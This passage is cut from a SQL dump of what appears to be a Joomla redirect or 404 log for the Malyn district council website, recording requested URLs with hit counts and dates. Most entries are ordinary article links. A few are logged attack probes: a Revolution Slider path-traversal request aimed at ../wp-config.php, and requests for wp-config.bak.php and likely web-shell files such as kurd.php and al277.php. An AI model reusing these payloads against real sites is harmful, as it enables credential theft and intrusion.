00:00:00',301),(25181,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=250:-2010-i&catid=11&Itemid=14&lang=uk','','','',2,0,'2016-01-18 14:31:07','0000-00-00 00:00:00',301),(25182,'http://malyn-rayrada.org.ua/index.php/2010-06-05-12-55-45/2010-06-06-05-22-15/kvituche-selo/2014-09-22-17-49-27/img-7481-91','','','',10,0,'2016-01-18 17:08:38','0000-00-00 00:00:00',301),(25183,'http://malyn-rayrada.org.ua/index.php/2010-06-05-12-55-45/2010-06-06-05-22-15/kvituche-selo/2014-09-22-17-50-18/malinshchina-i-malinchani-74','','','',10,0,'2016-01-18 17:08:54','0000-00-00 00:00:00',301),(25184,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=671:2012-05-09-13-09-05&catid=11:2010-06-05-14-33-33&Itemid=14&lang=en','','','',4,0,'2016-01-18 17:11:21','0000-00-00 00:00:00',301),(25185,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=671:2012-05-09-13-09-05&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','','',4,0,'2016-01-18 17:11:24','0000-00-00 00:00:00',301),(25186,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=747:2012-08-03-09-21-28&catid=11&lang=uk','','','',4,0,'2016-01-18 17:15:07','0000-00-00 00:00:00',301),(25187,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=759:2012-09-14-08-35-05&catid=11&lang=uk','','','',4,0,'2016-01-18 17:15:16','0000-00-00 00:00:00',301),(25188,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=760:-qq-24-2012-&catid=11&lang=uk','','','',4,0,'2016-01-18 17:15:18','0000-00-00 00:00:00',301),(25189,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=771:-2012-2015-&catid=45&Itemid=84&lang=en','','','',4,0,'2016-01-18 17:16:28','0000-00-00 00:00:00',301),(25190,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=775:2012-10-02-09-35-53&catid=45&Itemid=84&lang=uk','','','',4,0,'2016-01-18 17:17:09','0000-00-00 00:00:00',301),(25191,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=794:-lr&catid=45&Itemid=84&lang=uk','','','',4,0,'2016-01-18 17:17:32','0000-00-00 00:00:00',301),(25192,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=797:-6-16112010-5-&catid=45&Itemid=84&lang=uk','','','',4,0,'2016-01-18 17:17:44','0000-00-00 00:00:00',301),(25193,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=581:2012-02-27-13-13-19&catid=40&Itemid=77&lang=uk','','','',3,0,'2016-01-18 17:17:49','0000-00-00 00:00:00',301),(25194,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=832:-9-2012-&catid=11&lang=en','','','',4,0,'2016-01-18 17:19:49','0000-00-00 00:00:00',301),(25195,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=832:-9-2012-&catid=11&lang=ru','','','',4,0,'2016-01-18 17:19:52','0000-00-00 00:00:00',301),(25196,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=832:-9-2012-&catid=11&lang=uk','','','',4,0,'2016-01-18 17:19:55','0000-00-00 00:00:00',301),(25197,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=884:2012-12-24-10-46-13&catid=11&lang=ru','','','',4,0,'2016-01-18 17:22:02','0000-00-00 00:00:00',301),(25198,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=884:2012-12-24-10-46-13&catid=11&lang=uk','','','',4,0,'2016-01-18 17:22:05','0000-00-00 00:00:00',301),(25199,'http://www.malyn-rayrada.org.ua/index.php/1204-vidbulas-42-sesiya-rajonnoji-radi?layout=default&page=&print=1&tmpl=component','','http://go.mail.ru/search_images','',1,0,'2016-01-18 17:56:48','0000-00-00 00:00:00',301),(25200,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=category&layout=blog&id=43&Itemid=82&lang=uk&limitstart=25','','','',1,0,'2016-01-18 18:46:24','0000-00-00 00:00:00',301),(25201,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=category&layout=blog&id=43&Itemid=82&lang=uk&limitstart=25','','','',3,0,'2016-01-18 18:52:37','0000-00-00 00:00:00',301),(25202,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=category&id=36&layout=blog&Itemid=70&lang=en&limitstart=10','','','',1,0,'2016-01-18 22:23:38','0000-00-00 00:00:00',301),(25203,'http://www.malyn-rayrada.org.ua/index.php?Itemid=84&id=45:--14112012-&lang=ru&layout=blog&option=com_content&view=category','','','',3,0,'2016-01-19 00:03:07','0000-00-00 00:00:00',301),(25204,'http://www.malyn-rayrada.org.ua/wp-admin/admin-ajax.php?action=revolution-slider_show_image&img=../wp-config.php','','','',1,0,'2016-01-19 08:55:45','0000-00-00 00:00:00',301),(25205,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=category&layout=blog&id=45&Itemid=84&lang=en&limitstart=5','','','',3,0,'2016-01-19 09:39:54','0000-00-00 00:00:00',301),(25206,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=475:2011-11-22-07-58-34&catid=38&Itemid=73&lang=uk','','','',6,0,'2016-01-19 16:01:02','0000-00-00 00:00:00',301),(25207,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=321:------------l---------r--2011-2016-&catid=33&Itemid=66&lang=uk','','','',1,0,'2016-01-19 16:58:58','0000-00-00 00:00:00',301),(25208,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=820:2012-11-14-16-42-11&catid=45&Itemid=84&lang=en','','','',2,0,'2016-01-19 17:06:06','0000-00-00 00:00:00',301),(25209,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=820:2012-11-14-16-42-11&catid=45&Itemid=84&lang=uk','','','',2,0,'2016-01-19 17:06:08','0000-00-00 00:00:00',301),(25210,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=821:------12--2012--311-l------------r&catid=45:--14112012-&Itemid=84&lang=uk','','','',2,0,'2016-01-19 17:06:12','0000-00-00 00:00:00',301),(25211,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=832:-9-2012-&catid=11:2010-06-05-14-33-33&Itemid=14&lang=en','','','',2,0,'2016-01-19 17:07:05','0000-00-00 00:00:00',301),(25212,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=832:-9-2012-&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','','',2,0,'2016-01-19 17:07:06','0000-00-00 00:00:00',301),(25213,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=832:-9-2012-&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',2,0,'2016-01-19 17:07:08','0000-00-00 00:00:00',301),(25214,'http://malyn-rayrada.org.ua/wp-config.bak.php','','','',1,0,'2016-01-19 18:00:29','0000-00-00 00:00:00',301),(25215,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=category&layout=blog&id=40&Itemid=77&lang=uk&limitstart=15','','','',3,0,'2016-01-19 18:59:10','0000-00-00 00:00:00',301),(25216,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=category&id=40&layout=blog&Itemid=77&lang=uk&limitstart=15','','','',1,0,'2016-01-19 18:59:29','0000-00-00 00:00:00',301),(25217,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=883:-2012-&catid=11:2010-06-05-14-33-33&Itemid=14&lang=en','','','',2,0,'2016-01-19 20:00:07','0000-00-00 00:00:00',301),(25218,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=category&id=46&layout=blog&Itemid=85&lang=ru','','','',2,0,'2016-01-20 00:34:32','0000-00-00 00:00:00',301),(25219,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1278:2014-04-11-13-44-30&Itemid=14&lang=ru&option=com_content&view=article','','','',1,0,'2016-01-20 00:37:56','0000-00-00 00:00:00',301),(25220,'http://www.malyn-rayrada.org.ua/index.php/2010-06-05-12-55-45?id=58','','','',1,0,'2016-01-20 01:02:37','0000-00-00 00:00:00',301),(25221,'http://www.malyn-rayrada.org.ua/index.php/469-sogodni-22-sichnja-v-ukraini-vidznachaetsja-den?tmpl=component&print=1&layout=default&page=','','','',1,0,'2016-01-20 03:48:02','0000-00-00 00:00:00',301),(25222,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=category&layout=blog&id=42&Itemid=80&lang=uk&limitstart=5','','','',2,0,'2016-01-20 12:39:26','0000-00-00 00:00:00',301),(25223,'http://malyn-rayrada.org.ua/cache/controller.php','','','',1,0,'2016-01-20 15:09:01','0000-00-00 00:00:00',301),(25224,'http://malyn-rayrada.org.ua/cfg.php','','','',2,0,'2016-01-20 15:09:23','0000-00-00 00:00:00',301),(25225,'http://malyn-rayrada.org.ua/kurd.php','','','',1,0,'2016-01-20 15:09:24','0000-00-00 00:00:00',301),(25226,'http://malyn-rayrada.org.ua/images/al277.php','','','',1,0,'2016-01-20 15:09:27','0000-00-00 00:00:00',301),(25227,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=category&layout=blog&id=49&Itemid=89&lang=uk&limitstart=5','','https://www.google.com.ua/','',4,0,'2016-01-20 15:22:45','0000-00-00 00:00:00',301),(25228,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11&id=1154:7-&lang=uk&option=com_content&view=article','','','',3,0,'2016-01-20 22:22:59','0000-00-00 00:00:00',301),(25229,'http://www.malyn-rayrada.org.ua/index.php?Itemid=60&catid=29&id=188:2010-12-15-13-18-12&lang=uk&option=com_content&view=article','','','',3,0,'2016-01-20 23:55:12','0000-00-00 00:00:00',301),(25230,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=category&id=37&layout=blog&Itemid=72&lang=en&limitstart=5','','','',2,0,'2016-01-21 02:34:45','0000-00-00 00:00:00',301),(25231,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=category&layout=blog&id=37&Itemid=72&lang=en&limitstart=5','','','',1,0,'2016-01-21 07:04:29','0000-00-00 00:00:00',301),(25232,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1034:2013-06-23-15-11-25&lang=en&option=com_content&view=article','','','',3,0,'2016-01-21 08:11:00','0000-00-00 00:00:00',301),(25233,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=category&layout=blog&id=43&Itemid=82&lang=en&limitstart=30','','','',3,0,'2016-01-21 09:32:56','0000-00-00 00:00:00',301),(25234,'http://malyn-rayrada.org.ua/index.php?Itemid=86&id=47:-21022013-&lang=uk&layout=blog&limitstart=5&option=com_content&view=category','','','',1,0,'2016-01-21 14:41:11','0000-00-00 00:00:00',301),(25235,'http://www.malyn-rayrada.org.ua/index.php?Itemid=76&catid=39&id=548:-2011-2015-&lang=uk&option=com_content&view=article','','','',3,0,'2016-01-21 14:41:15','0000-00-00 00:00:00',301),(25236,'http://malyn-rayrada.org.ua/index.php?Itemid=14&catid=11:2010-06-05-14-33-33&id=646:2012-04-08-07-58-55&lang=uk&option=com_content&view=article','','','',1,0,'2016-01-21 22:56:53','0000-00-00 00:00:00',301),(25237,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=66:2010-07-21-07-33-49&catid=11:2010-06-05-14-33-33&Itemid=16&lang=uk','','','',1,0,'2016-01-22 00:04:06','0000-00-00 00:00:00',301),(25238,'http://www.malyn-rayrada.org.ua/index.php?Itemid=60&catid=29:--15122010-&id=207:2010-12-15-14-22-39&lang=ru&option=com_content&view=article','','','',4,0,'2016-01-22 00:32:43','0000-00-00 00:00:00',301),(25239,'http://www.malyn-rayrada.org.ua/index.php?Itemid=5&catid=2&id=7:2010-06-05-14-44-23&lang=uk&option=com_content&view=article','','','',3,0,'2016-01-22 00:32:47','0000-00-00 00:00:00',301),(25240,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=568:-2011-&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','','',1,0,'2016-01-22 01:57:45','0000-00-00 00:00:00',301),(25241,'http://malyn-rayrada.org.ua/index.php/component/content/article?lang=en&id=article','','','',16,0,'2016-01-22 07:24:01','0000-00-00 00:00:00',301),(25242,'http://malyn-rayrada.org.ua/index.php/component/content/article?lang=ru&id=article','','','',14,0,'2016-01-22 07:24:28','0000-00-00 00:00:00',301),(25243,'http://malyn-rayrada.org.ua/index.php/component/content/article?lang=uk&id=article','','','',21,0,'2016-01-22 07:25:48','0000-00-00 00:00:00',301),(25244,'http://www.malyn-rayrada.org.ua/index.php?catid=945&id=945:perevirka','','','',12,0,'2016-01-22 07:35:26','0000-00-00 00:00:00',301),(25245,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=568:-2011-&catid=11&lang=ru','','','',1,0,'2016-01-22 08:17:29','0000-00-00 00:00:00',301),(25246,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=66:2010-07-21-07-33-49&catid=11:2010-06-05-14-33-33&Itemid=16&lang=en','','','',1,0,'2016-01-22 08:43:55','0000-00-00 00:00:00',301),(25247,'http://malyn-rayrada.org.ua/index.php?Itemid=14&catid=11:2010-06-05-14-33-33&id=805:2012-10-30-13-35-53&lang=uk&option=com_content&view=article','','','',1,0,'2016-01-22 10:25:07','0000-00-00 00:00:00',301),(25248,'http://malyn-rayrada.org.ua/index.php/2010-06-05-12-55-45/2010-06-06-05-22-15/kvituche-selo/2014-09-22-17-49-27/pochesni-gromadyani-rajonu-1-11','','','',3,0,'2016-01-22 11:00:56','0000-00-00 00:00:00',301),(25249,'http://malyn-rayrada.org.ua/index.php/2010-06-05-12-55-45/2010-06-06-05-22-15/kvituche-selo/2014-09-22-17-50-18/malinshchina-i-malinchani-77','','','',3,0,'2016-01-22 11:00:58','0000-00-00 00:00:00',301),(25250,'http://malyn-rayrada.org.ua/index.php/2010-06-05-12-55-45/2010-06-06-05-22-15/kvituche-selo/2014-09-22-17-50-18/malinshchina-i-malinchani-83','','','',3,0,'2016-01-22 11:01:00','0000-00-00 00:00:00',301),(25251,'http://malyn-rayrada.org.ua/index.php/2010-06-05-12-55-45/2010-06-06-05-22-15/kvituche-selo/2014-09-23-06-08-04/img-0908-10-104','','','',3,0,'2016-01-22 11:01:01','0000-00-00 00:00:00',301),(25252,'http://malyn-rayrada.org.ua/index.php/2010-06-05-12-55-45/2010-06-06-05-22-15/kvituche-selo/2014-09-23-06-08-04/img-1145-24-116','','','',3,0,'2016-01-22 11:01:03','0000-00-00 00:00:00',301),(25253,'http://malyn-rayrada.org.ua/index.php/933-vidbulas-35-sesiya-rajonnoji-radi?tmpl=component&print=1&layout=default&page=','','','',3,0,'2016-01-22 11:01:12','0000-00-00 00:00:00',301),(25254,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=20:-2009-&catid=16&Itemid=39&lang=en','','','',2,0,'2016-01-22 11:01:41','0000-00-00 00:00:00',301),(25255,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=20:-2009-&catid=16&Itemid=39&lang=ru','','','',2,0,'2016-01-22 11:01:43','0000-00-00 00:00:00',301),(25256,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=20:-2009-&catid=16:2010-06-06-10-55-25&Itemid=39&lang=en','','','',2,0,'2016-01-22 11:01:46','0000-00-00 00:00:00',301),(25257,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=20:-2009-&catid=16:2010-06-06-10-55-25&Itemid=39&lang=ru','','','',2,0,'2016-01-22 11:01:49','0000-00-00 00:00:00',301),(25258,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=211:2010-12-15-14-46-24&catid=29&Itemid=60&lang=uk','','','',2,0,'2016-01-22 11:01:52','0000-00-00 00:00:00',301),(25259,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=211:2010-12-15-14-46-24&catid=29:--15122010-&Itemid=60&lang=en','','','',2,0,'2016-01-22 11:01:54','0000-00-00 00:00:00',301),(25260,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=211:2010-12-15-14-46-24&catid=29:--15122010-&Itemid=60&lang=ru','','','',2,0,'2016-01-22 11:01:56','0000-00-00 00:00:00',301),(25261,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=211:2010-12-15-14-46-24&catid=29:--15122010-&Itemid=60&lang=uk','','','',2,0,'2016-01-22 11:01:57','0000-00-00 00:00:00',301),(25262,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=218:2010-12-21-06-45-54&catid=11&lang=uk','','','',2,0,'2016-01-22 11:01:59','0000-00-00 00:00:00',301),(25263,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=218:2010-12-21-06-45-54&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',2,0,'2016-01-22 11:02:01','0000-00-00 00:00:00',301),(25264,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=439:2011-10-21-16-22-19&catid=37:--21102011-&Itemid=72&lang=en','','','',2,0,'2016-01-22 11:02:22','0000-00-00 00:00:00',301),(25265,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=439:2011-10-21-16-22-19&catid=37:--21102011-&Itemid=72&lang=ru','','','',2,0,'2016-01-22 11:02:24','0000-00-00 00:00:00',301),(25266,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=439:2011-10-21-16-22-19&catid=37:--21102011-&Itemid=72&lang=uk','','','',2,0,'2016-01-22 11:02:26','0000-00-00 00:00:00',301),(25267,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=464:2011-11-11-12-15-19&catid=38&Itemid=73&lang=uk','','','',2,0,'2016-01-22 11:02:27','0000-00-00 00:00:00',301),(25268,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=483:-2012-2016-&catid=38&Itemid=73&lang=uk','','','',2,0,'2016-01-22 11:02:35','0000-00-00 00:00:00',301),(25269,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=523:2011-12-30-10-16-28&catid=38&Itemid=73&lang=uk','','','',2,0,'2016-01-22 11:02:39','0000-00-00 00:00:00',301),(25270,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=523:2011-12-30-10-16-28&catid=38:--19122011-&Itemid=73&lang=en','','','',2,0,'2016-01-22 11:02:41','0000-00-00 00:00:00',301),(25271,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=523:2011-12-30-10-16-28&catid=38:--19122011-&Itemid=73&lang=uk','','','',10,0,'2016-01-22 11:02:44','0000-00-00 00:00:00',301),(25272,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=562:-19122011194-30122011202&catid=39:-22022012-&Itemid=76&lang=en','','','',2,0,'2016-01-22 11:02:46','0000-00-00 00:00:00',301),(25273,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=562:-19122011194-30122011202&catid=39:-22022012-&Itemid=76&lang=ru','','','',2,0,'2016-01-22 11:02:47','0000-00-00 00:00:00',301),(25274,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=565:2012-02-03-09-48-29&catid=39:-22022012-&Itemid=76&lang=en','','','',2,0,'2016-01-22 11:02:58','0000-00-00 00:00:00',301),(25275,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=565:2012-02-03-09-48-29&catid=39:-22022012-&Itemid=76&lang=ru','','','',2,0,'2016-01-22 11:03:00','0000-00-00 00:00:00',301),(25276,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=565:2012-02-03-09-48-29&catid=39:-22022012-&Itemid=76&lang=uk','','','',2,0,'2016-01-22 11:03:01','0000-00-00 00:00:00',301),(25277,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=616:----l-r&catid=40:--28032012-&Itemid=77&lang=en','','','',2,0,'2016-01-22 11:03:16','0000-00-00 00:00:00',301),(25278,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=616:----l-r&catid=40:--28032012-&Itemid=77&lang=ru','','','',2,0,'2016-01-22 11:03:18','0000-00-00 00:00:00',301),(25279,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=616:----l-r&catid=40:--28032012-&Itemid=77&lang=uk','','','',2,0,'2016-01-22 11:03:20','0000-00-00 00:00:00',301),(25280,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=617:-----l---28r-----&catid=40:--28032012-&Itemid=77&lang=en','','','',2,0,'2016-01-22 11:03:22','0000-00-00 00:00:00',301),(25281,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=617:-----l---28r-----&catid=40:--28032012-&Itemid=77&lang=ru','','','',2,0,'2016-01-22 11:03:24','0000-00-00 00:00:00',301),(25282,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=617:-----l---28r-----&catid=40:--28032012-&Itemid=77&lang=uk','','','',2,0,'2016-01-22 11:03:25','0000-00-00 00:00:00',301),(25283,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=619:-11-6-&catid=11&lang=en','','','',2,0,'2016-01-22 11:03:28','0000-00-00 00:00:00',301),(25284,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=619:-11-6-&catid=11&lang=ru','','','',2,0,'2016-01-22 11:03:30','0000-00-00 00:00:00',301),(25285,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=619:-11-6-&catid=11&lang=uk','','','',2,0,'2016-01-22 11:03:31','0000-00-00 00:00:00',301),(25286,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=620:2012-03-29-10-03-40&catid=11&lang=uk','','','',2,0,'2016-01-22 11:03:33','0000-00-00 00:00:00',301),(25287,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=644:2012-04-04-09-52-48&catid=11&lang=uk','','','',2,0,'2016-01-22 11:03:35','0000-00-00 00:00:00',301),(25288,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=644:2012-04-04-09-52-48&catid=11:2010-06-05-14-33-33&Itemid=14&lang=en','','','',2,0,'2016-01-22 11:03:40','0000-00-00 00:00:00',301),(25289,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=647:2012-04-09-08-35-02&catid=42&Itemid=80&lang=uk','','','',4,0,'2016-01-22 11:03:42','0000-00-00 00:00:00',301),(25290,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=649:-2011-2015-&catid=42&Itemid=80&lang=uk','','','',9,0,'2016-01-22 11:03:43','0000-00-00 00:00:00',301),(25291,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=671:2012-05-09-13-09-05&catid=11&lang=uk','','','',2,0,'2016-01-22 11:03:45','0000-00-00 00:00:00',301),(25292,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=816:2012-11-14-16-33-01&catid=45&Itemid=84&lang=en','','','',2,0,'2016-01-22 11:03:53','0000-00-00 00:00:00',301),(25293,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=816:2012-11-14-16-33-01&catid=45&Itemid=84&lang=ru','','','',2,0,'2016-01-22 11:03:55','0000-00-00 00:00:00',301),(25294,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=816:2012-11-14-16-33-01&catid=45&Itemid=84&lang=uk','','','',2,0,'2016-01-22 11:03:57','0000-00-00 00:00:00',301),(25295,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=818:2012-11-14-16-37-52&catid=45&Itemid=84&lang=en','','','',2,0,'2016-01-22 11:03:58','0000-00-00 00:00:00',301),(25296,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=818:2012-11-14-16-37-52&catid=45&Itemid=84&lang=ru','','','',2,0,'2016-01-22 11:04:00','0000-00-00 00:00:00',301),(25297,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=818:2012-11-14-16-37-52&catid=45&Itemid=84&lang=uk','','','',2,0,'2016-01-22 11:04:02','0000-00-00 00:00:00',301),(25298,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=818:2012-11-14-16-37-52&catid=45:--14112012-&Itemid=84&lang=en','','','',2,0,'2016-01-22 11:04:03','0000-00-00 00:00:00',301),(25299,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=818:2012-11-14-16-37-52&catid=45:--14112012-&Itemid=84&lang=ru','','','',2,0,'2016-01-22 11:04:05','0000-00-00 00:00:00',301),(25300,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=818:2012-11-14-16-37-52&catid=45:--14112012-&Itemid=84&lang=uk','','','',2,0,'2016-01-22 11:04:07','0000-00-00 00:00:00',301),(25301,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=category&layout=blog&id=47&Itemid=86&lang=ru&limitstart=10','','','',1,0,'2016-01-22 13:22:30','0000-00-00 00:00:00',301),(25302,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=category&layout=blog&id=47&Itemid=86&lang=ru&limitstart=15','','','',1,0,'2016-01-22 13:26:36','0000-00-00 00:00:00',301),(25303,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=581:2012-02-27-13-13-19&catid=40:--28032012-&Itemid=77&lang=ru','','','',1,0,'2016-01-22 17:21:58','0000-00-00 00:00:00',301),(25304,'http://www.malyn-rayrada.org.ua/index.php?Itemid=73&catid=38&id=450:-l-2011-2013-r&lang=uk&option=com_content&view=article','','','',5,0,'2016-01-22 18:31:22','0000-00-00 00:00:00',301),(25305,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=category&layout=blog&id=59&Itemid=107&lang=en&limitstart=5','','','',2,0,'2016-01-22 20:23:56','0000-00-00 00:00:00',301),(25306,'http://malyn-rayrada.org.ua/index.php?Itemid=73&catid=38:--19122011-&id=510:-2011-&lang=ru&option=com_content&view=article','','','',1,0,'2016-01-22 23:28:59','0000-00-00 00:00:00',301),(25307,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/rishennya-vid-19-12-2014-roku/969-pro-zvernennya-do-golovi-zhitomirskoji-oblasnoji-radi-shchodo-vidmini-pogodzhennya-dp-ob-ednana-girnicho-khimichna-kompaniya?tmpl=component&print=1&layout','','','',1,0,'2016-01-23 00:29:35','0000-00-00 00:00:00',301),(25308,'http://www.malyn-rayrada.org.ua/forum/','','','',1,0,'2016-01-23 11:45:53','0000-00-00 00:00:00',301),(25309,'http://www.malyn-rayrada.org.ua/index.php?option=com_kunena','','','',1,0,'2016-01-23 11:45:53','0000-00-00 00:00:00',301),(25310,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja?tmpl=component&print=1&layout=default&page=&catid=79&id=1261:pro-rajonnu-programu-ozdorovlennya-teritoriji-malinskogo-rajonu-vid-skazu-na-2016-2020-roki','','','',2,0,'2016-01-23 14:17:35','0000-00-00 00:00:00',301),(25311,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja?tmpl=component&print=1&layout=default&page=&catid=79&id=1263:pro-rajonnu-programu-sotsialnoji-pidtrimki-ditej-simej-ta-molodi-na-2016-2020-roki','','','',2,0,'2016-01-23 14:17:37','0000-00-00 00:00:00',301),(25312,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja?tmpl=component&print=1&layout=default&page=&catid=79&id=1266:pro-rajonnu-tsilovu-programu-roboti-iz-obdarovanoyu-moloddyu-na-2016-2018-roki','','','',2,0,'2016-01-23 14:17:39','0000-00-00 00:00:00',301),(25313,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja?tmpl=component&print=1&layout=default&page=&catid=79&id=1267:pro-programu-zabezpechennya-deputatskoji-diyalnosti-na-2016-rik','','','',2,0,'2016-01-23 14:17:40','0000-00-00 00:00:00',301),(25314,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja?tmpl=component&print=1&layout=default&page=&catid=79&id=1268:pro-deleguvannya-povnovazhen-malinskoji-rajonnoji-radi-malinskij-rajonnij-derzhavnij-administratsiji','','','',2,0,'2016-01-23 14:17:42','0000-00-00 00:00:00',301),(25315,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja?tmpl=component&print=1&layout=default&page=&catid=79&id=1269:pro-znyattya-z-kontrolyu-rishen-rajonnoji-radi','','','',2,0,'2016-01-23 14:17:43','0000-00-00 00:00:00',301),(25316,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja?tmpl=component&print=1&layout=default&page=&catid=79&id=1270:pro-zatverdzhennya-planu-diyalnosti-rajonnoji-radi-z-pidgotovki-proektiv-regulyatornikh-aktiv-na-2016-rik','','','',2,0,'2016-01-23 14:17:45','0000-00-00 00:00:00',301),(25317,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja?tmpl=component&print=1&layout=default&page=&catid=79&id=1271:pro-zatverdzhennya-strukturi-ta-chiselnosti-vikonavchogo-aparatu-radi-vitrat-na-jogo-utrimannya','','','',2,0,'2016-01-23 14:17:47','0000-00-00 00:00:00',301),(25318,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja?tmpl=component&print=1&layout=default&page=&catid=79&id=1274:pro-likvidatsiyu-lyubovitskoji-ta-shevchenkivskoji-zagalnoosvitnikh-shkil-i-ii-stupeniv','','','',2,0,'2016-01-23 14:17:49','0000-00-00 00:00:00',301),(25319,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja?tmpl=component&print=1&layout=default&page=&catid=79&id=1275:pro-pogodzhennya-zvilnennya-z-posadi-direktora-rajonnogo-budinku-kulturi-vishnevskoji-o-v','','','',2,0,'2016-01-23 14:17:51','0000-00-00 